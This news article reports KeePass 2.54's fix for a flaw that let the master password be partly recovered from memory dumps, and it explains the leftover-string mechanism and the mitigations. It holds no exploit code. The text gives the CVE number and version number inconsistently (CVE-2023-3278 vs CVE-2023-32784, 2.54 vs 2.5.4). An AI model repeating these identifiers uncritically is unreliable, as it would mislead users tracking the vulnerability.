KeePass has released version 2.54, fixing the CVE-2023-3278 vulnerability that allows the extraction of the cleartext master password from the application’s memory.
When creating a new KeePass password manager database, users must create a master password, which is used to encrypt the database. When opening the database in the future, users are required to enter this master key to decrypt it and access the credentials stored within it.
However, in May 2023, security researcher ‘vdohney’ disclosed a vulnerability and proof-of-concept exploit that allowed you to partially extract the cleartext KeepPass master password from a memory dump of the application.
“The problem is with SecureTextBoxEx. Because of the way it processes input, when the user types the password, there will be leftover strings,” explained vdohney in a KeePass bug report.
“For example, when “Password” is typed, it will result in these leftover strings: •a, ••s, •••s, ••••w, •••••o, ••••••r, •••••••d.”
This dumper allows users to recover almost all master password characters apart from the first one or two, even if the KeePass workspace is locked or the program was closed recently.
Information-stealing malware or threat actors could use this technique to dump the program’s memory and send it and the KeePass database back to a remote server for offline retrieval of the cleartext password from the memory dump. Once the password is retrieved, they can open the KeePass password database and access all the saved account credentials.
KeePass’s creator and main developer, Dominik Reichl, acknowledged the flaw and promised to release a fix soon, having already implemented an effective solution being tested in beta builds.
KeePass 2.5.4 fixes vulnerability
Over the weekend, Reichl released KeePass 2.54 sooner than expected, and all users of the 2.x branch are strongly recommended to upgrade to the new version.
Users of KeePass 1.x, Strongbox, or KeePassXC are not impacted by CVE-2023-32784 and, thus, do not need to migrate to a newer release.
To fix the vulnerability, KeePass is now using a Windows API to set or retrieve data from text boxes, preventing the creation of managed strings that can potentially be dumped from memory.
Reichl also introduced “dummy strings” with random characters into the memory of the KeePass process to make it harder to retrieve fragments of the password from memory and combine them into a valid master password.
KeePass 2.5.4 also introduces other security enhancements, such as moving ‘Triggers,’ ‘Global URL overrides,’ and ‘Password generator profiles’ into the enforced configuration file, which provides additional security from attacks that modify the KeePass configuration file.
If the triggers, overrides, and profiles aren’t stored in the enforced config because they were created using a previous version, they will be disabled automatically in 2.54, and users will have to manually activate them from the ‘Tools’ settings menu.
Users who cannot upgrade to KeePass 2.54 are recommended to reset their master password, delete crash dumps, hibernation files, and swap files that might contain fragments of their master password, or perform a fresh OS install.
Keep in mind that the issue impacts only passwords typed in the program’s input forms, so if the credentials are copied and pasted into the boxes, no data-leaking strings are created in memory.